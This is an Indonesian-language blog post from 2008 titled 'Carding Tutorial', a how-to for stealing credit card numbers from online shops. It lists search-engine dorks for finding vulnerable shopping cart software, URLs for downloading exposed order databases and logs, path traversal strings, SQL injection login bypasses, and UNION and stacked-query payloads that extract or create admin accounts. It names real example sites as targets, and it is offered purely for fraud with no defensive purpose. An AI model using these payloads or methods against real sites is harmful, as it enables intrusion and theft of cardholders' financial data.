Carding Tutorial
May 6, 2008 by bernadsatriani
Metacart
Ktik –> allinurl:/metacart/
Contoh target : www.imagexpres.com/metacart/moreinfo.asp
Hapus moreinfo.asp dan ganti dengan –> /database/metacart.mdb
Hasilnya : /www.imagexpres.com/metacart/database/metacart.mdb
Kalo udah download file tsb dan buka pake Microsoft Acces
Cari aja CCnya, kalo ga ada berarti blm beruntung. Cari target laen.
Shopadmin
Ketik –> allinurl:/shopadmin.asp
Contoh target : www.partsupply.in.th/shopadmin.asp
Trus masukin user sama passwordnya pake SQL Injection.
user : ‘or’1
pass : ‘or’1
Buka filenya satu persatu dan cari CCnya. Kalo ga ada, cari target laen.
Index CGI
Ketik –> allinurl:/store/index.cgi/page=
Contoh target : www.cashwells.com/cgi-bin/store/index.cgi?page=Repair_Manuals.htm
Hapus Repair_Manuals.htm dan ganti dengan –> ../admin/files/order.log
Hasilnya:www.cashwells.com/cgi-bin/store/index.cgi?page=../admin/files/order.log
DCShop
Ketik –> allinurl:/DCShop/
Contoh : www.contoh.com/blabla/DCShop/blabla
Hapus /DCShop/blabla dan ganti dengan –> /DCShop/orders/orders.txt atau /DCShop/Orders/orders.txt
Hasilnya : www.contoh.com/blabla/DCShop/orders/orders.txt
commerceSQL
Ketik –> allinurl:/commercesql/
Contoh : www.contoh.com/commercesql/blabla
Hapus commercesql/blabla dan ganti dengan –>
cgi-bin/commercesql/index.cgi?page=
Hasilnya : www.contoh.com/cgi-bin/commercesql/index.cgi?page=
Untuk melihat admin config –>
www.contoh.com/cgi-bin/commercesql/index.cgi?page=../admin/admin_conf.pl
Untuk melihat admin manager –>
www.contoh.com/cgi-bin/commercesql/index.cgi?page=../admin/manager.cgi
Untuk melihat file log/CCnya –>
www.contoh.com/cgi-bin/commercesql/index.cgi?page=../admin/files/order.log
PDshopro
Ketik –> allinurl:/shop/category.asp/catid=
Contoh : www.contoh.com/shop/category.asp/catid=blabla
Hapus /shop/category.asp/catid=blabla dang anti dengan –> /admin/dbsetup.asp
Hasilnya : www.contoh.com/admin/dbsetup.asp
Dari keterangan diatas , kita dapati file databasenya dgn nama sdatapdshoppro.mdb
Download file sdatapdshoppro.mdb dengan merubah url nya menjadi www.contoh.com/data/pdshoppro.mdb
Buka file tsb pakai Microsoft Acces
EShop
Ketik –> allinurl:/eshop/
Contoh : www.contoh.com/blabla/eshop
Hapus /eshop dan ganti dengan –> /cg-bin/eshop/database/order.mdb
Hasilnya : www.contoh.com/…/cg-bin/eshop/database/order.mdb
Download file *.mdb nya dan buka pake Microsoft Acces
Cart32 v3.5a
Ketik –> allinurl:/cart32.exe/
Contoh : www.wideopen.net/wrburns_s/cgi-bin/cart32.exe/NoItemFound
Ganti NoItemFound dengan –> error
Bila kita mendapati page error dg keterangan instalasi dibawahnya, berarti kita sukses!
Sekarang, kita menuju pada keterangan di bawahnya, geser halaman kebawah, dan cari bagian Page Setup and Directory
Kalau dibagian tersebut terdapat list file dgn format/akhiran .c32 berarti di site tsb. terdapat file berisi data cc
Copy salah satu file .c32 yg ada atau semuanya ke notepad atau program text editor lainnya.
Ganti string url tsb. menjadi seperti ini : http://www.wideopen.net/wrburns_s/cgi-bin/cart32/
Nah.., paste satu per satu, file .c32 ke akhir url yg sudah dimodifikasi tadi, dengan format
http://www.contoh.com/cart32/
Contoh http://www.wideopen.net/wrburns_s/cgi-bin/cart32/WRBURNS-001065.c32
VP-ASP Shopping Cart 5.0 Cara II
Ketik –> allinurl:/vpasp/shopdisplayproducts.asp
Buka url target dan tambahkan string berikut di akhir bagian shopdisplayproducts.asp
Contoh :
http://…/vpasp/shopdisplayproducts.asp?cat=qwerty’%20union%20select%20fldauto,
fldpassword%20from%20tbluser%20where%20fldusername=
‘admin’%20and%20fldpassword%20like%20′a%25′–
Gantilah nilai dari string url terakhir dg:
%20′a%25′–
%20′b%25′–
%20′c%25′–
Kalau berhasil, kita akan mendapatkan informasi username dan password admin
Untuk login admin ke http://…/vpasp/shopadmin.asp
Cari sendiri CCnya
VP-ASP Shopping Cart 5.0
Ketik –> allinurl:/vpasp/shopsearch.asp
Buka url target dan utk membuat admin baru, postingkan data berikut satu per satu pada bagian search engine :
Keyword=&category=5); insert into tbluser (fldusername) values
(”)–&SubCategory=&hide=&action.x=46&action.y=6
Keyword=&category=5); update tbluser set fldpassword=” where
fldusername=”–&SubCategory=All&action.x=33&action.y=6
Keyword=&category=3); update tbluser set fldaccess=’1′ where
fldusername=”–&SubCategory=All&action.x=33&action.y=6
Jangan lupa untuk mengganti dan nya terserah kamu.
Untuk mengganti password admin, masukkan keyword berikut :
Keyword=&category=5); update tbluser set fldpassword=” where
fldusername=’admin’–&SubCategory=All&action.x=33&action.y=6
Untuk login admin, ada di http://…/vpasp/shopadmin.asp
Lobby.asp
Lobby.asp Ketik –> allinurl: Lobby.asp
Contoh : www.contoh.com/mall/lobby.asp
Hapus tulisan mall/lobby.asp dan ganti dengan –> fpdb/shop.mdb
Hasilnya : www.contoh.com/fpdb/shop.mdb
Proddetail.asp
Ketik –> allinurl:proddetail.asp?prod=
Contoh : www.msasnow.org/proddetail.asp?prod=ACSASledRaffle
Hapus tulisan proddtail.asp?prod=SG369 dan ganti dengan –> fpdb/vsproducts.mdb
Hasilnya : www.msasnow.org/fpdb/vsproducts.mdb
Shopper.cgi
Ketik –> allinurl: /cgi-local/shopper.cgi
Contoh : www.target.com/cgi-local/shopper.cgi/?preadd=action&key=
Tambah dengan –> …&template=order.log
Hasilnya : www.target.com/cgi-local/shopper.cgi?preadd=action&key=…&template=order.log
Digishop
Ketik –> inurl:”/cart.php?m=”
Contoh : http://uniquescrapbooks.com.au/store/cart.php?m=view.
Hapus tulisan cart.php?m=view dan ganti dengan –>admin
Hasilnya http://uniquescrapbooks.com.au/store/admin
Trus masukin username sama pass nya pake SQL injection
Usename : ‘or”=”
Password : ‘or”=”
Buka filenya satu persatu, kalo ga ada CCnya cari target laen.
1. kita gunakan dari bugs webshop Sunshop
google dork : “Powered by SunShop 3.2″
Atau google dork : inurl:”/sunshop/index.php?action=”
Bugs : ganti kata index.php dgn admin
kl ada peringatan java script error klik “OK” aja
Contoh buat kalian : http://www.dohertysgym.com/sunshop/index.php
ganti dengan admin http://www.dohertysgym.com/sunshop/admin
Login pake SQL Injection :
Username : admin
Password :’or”=’
